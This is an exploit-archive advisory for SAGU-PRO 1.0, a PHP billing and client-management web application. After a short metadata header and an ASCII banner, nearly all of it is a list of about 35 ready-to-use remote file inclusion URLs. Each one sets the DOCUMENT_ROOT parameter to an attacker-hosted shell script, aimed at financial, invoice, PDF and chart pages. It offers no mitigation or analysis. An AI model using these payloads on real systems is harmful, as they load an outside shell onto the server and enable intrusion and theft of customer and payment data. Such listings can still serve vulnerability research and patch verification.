SAGU-PRO 1.0 - Multiple Remote File Inclusions

EDB-ID:

12052

CVE:

N/A

Author:

mat

Type:

webapps

Platform:

PHP

Published:

2010-04-04

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
SAGU-PRO v1.0 Multiple Remote File Include Vulnerability
Script: http://gulbf.com.br/?q=node/145
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)

//-----------------------------------------------------------------------------------------------------------+
http://[target]/[path]/cliente/ver_imagem.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/importar_pgtos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/up_pgtos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/ver_pgtos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/boletounibanco.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/bb/boleto_bb.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/bradesco06/boleto_bradesco.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/cef/boleto_cef.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/hsbc/boleto_hsbc.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/itau/boleto_itau.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/real57/boleto_real.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/recibo/recibo.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/boleto/santader_banespa_102/boleto_santander_banespa.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/cc/up_fluxo.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/cc/importar_fluxos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/cc/ver_fluxos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/financeiro/cc/post/altera_contacorrente.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_ativos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_data_ativacao.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_geral.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_suspensos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_valores_cobranca.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/clientes_vencto.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/prev_outros_servicos.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/prev_pacte_naveg.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/fpdf/resumo_log_pacote_conexao.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/graf_chamados_atendente.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/graf_evolucao_instalacoes_anual.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/graf_evolucao_instalacoes_mensal.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/graf_mensalidades_geradas_mensal.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/graf_visao_chamados.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/pre_graf_chamados_atendente.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/pre_graf_evolucao_instalacoes_mensal.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/pre_graf_mensalidades_geradas_mensal.php?DOCUMENT_ROOT=http://[shellscript]
http://[target]/[path]/graficos/pre_graf_visao_chamados.php?DOCUMENT_ROOT=http://[shellscript]
//-----------------------------------------------------------------------------------------------------------+

Greetings: All Hackerz